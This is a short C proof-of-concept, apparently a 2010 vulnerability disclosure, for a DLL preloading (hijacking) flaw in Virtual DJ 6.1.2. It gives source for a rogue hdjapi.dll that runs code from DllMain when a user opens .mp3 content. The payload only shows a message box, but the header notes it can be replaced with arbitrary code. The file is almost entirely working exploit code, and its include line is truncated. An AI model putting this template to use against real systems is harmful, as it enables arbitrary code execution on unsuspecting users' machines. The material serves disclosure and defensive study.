/*
Description: Virtual DJ 6.1.2 Also vulnerable for DLL Preloading on hdjapi.dll while loading .mp3 content.
Date: August 29, 2010
Author: Classity informatiebeveiliging
PoC: Displaying message box, but can be replaced by DLL with arbitrary payload.
*/
#include
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_pl();
return 0;
}
int dll_pl()
{
MessageBox(0, "Virtual DJ Vulnerable for DLL Preloading!", "DLL Message", MB_OK);
return 0;
}